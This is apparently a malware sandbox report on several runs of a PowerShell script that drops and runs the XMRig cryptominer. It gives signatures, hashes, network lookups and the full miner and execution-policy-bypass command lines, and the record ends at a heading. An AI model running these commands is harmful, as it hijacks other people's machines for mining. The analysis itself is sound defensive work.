N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dsvebgo3.3ub.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jbymk3mz.hni.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yotb1dht.jvu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:52

Platform

win10v2004-20240426-en

Max time kernel

1789s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_melesntd.4n3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


memory/4268-91-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-92-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-93-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-94-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-95-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-96-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-97-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-98-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-99-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-100-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-101-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-102-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-103-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-104-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-105-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-106-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-107-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-108-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-109-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-110-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-111-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-112-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-113-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-114-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-115-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-116-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-117-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-118-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted 2024-05-22 20:05
Reported 2024-05-22 20:36
Platform win10v2004-20240508-en
Max time kernel 1793s
Max time network 1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.146:443 www.bing.com tcp
US 8.8.8.8:53 146.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
NL 23.62.61.146:443 www.bing.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 129.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/4984-0-0x00007FFF5E983000-0x00007FFF5E985000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_leim02cx.o25.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4984-8-0x00000199485C0000-0x00000199485E2000-memory.dmp

memory/4984-11-0x00007FFF5E980000-0x00007FFF5F441000-memory.dmp

memory/4984-12-0x00007FFF5E980000-0x00007FFF5F441000-memory.dmp

memory/4984-13-0x00007FFF5E983000-0x00007FFF5E985000-memory.dmp

memory/4984-14-0x00007FFF5E980000-0x00007FFF5F441000-memory.dmp

memory/4984-16-0x00007FFF5E980000-0x00007FFF5F441000-memory.dmp

memory/4984-17-0x0000019948970000-0x0000019948982000-memory.dmp

memory/4984-18-0x0000019948590000-0x000001994859A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4300-49-0x000002014A7B0000-0x000002014A7D0000-memory.dmp

memory/4300-50-0x000002014A7F0000-0x000002014A810000-memory.dmp

memory/4300-51-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-52-0x000002014A810000-0x000002014A830000-memory.dmp

memory/4300-53-0x000002014A830000-0x000002014A850000-memory.dmp

memory/4300-54-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4984-55-0x00007FFF5E980000-0x00007FFF5F441000-memory.dmp

memory/4300-56-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-57-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-58-0x000002014A810000-0x000002014A830000-memory.dmp

memory/4300-59-0x000002014A830000-0x000002014A850000-memory.dmp

memory/4300-60-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-61-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-62-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-63-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-64-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-65-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-66-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-67-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-68-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-69-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-70-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-71-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-72-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-73-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-74-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-75-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-76-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-77-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-78-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-79-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-80-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-81-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-82-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-83-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-84-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-85-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-86-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-87-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-88-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-89-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-90-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-91-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-92-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-93-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-94-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-95-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-96-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-97-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-98-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-99-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-100-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-101-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-102-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-103-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-104-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-105-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-106-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-107-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-108-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-109-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-110-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-111-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-112-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-113-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-114-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-115-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-116-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-117-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-118-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted 2024-05-22 20:05
Reported 2024-05-22 20:36
Platform win11-20240419-en
Max time kernel 1797s
Max time network 1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

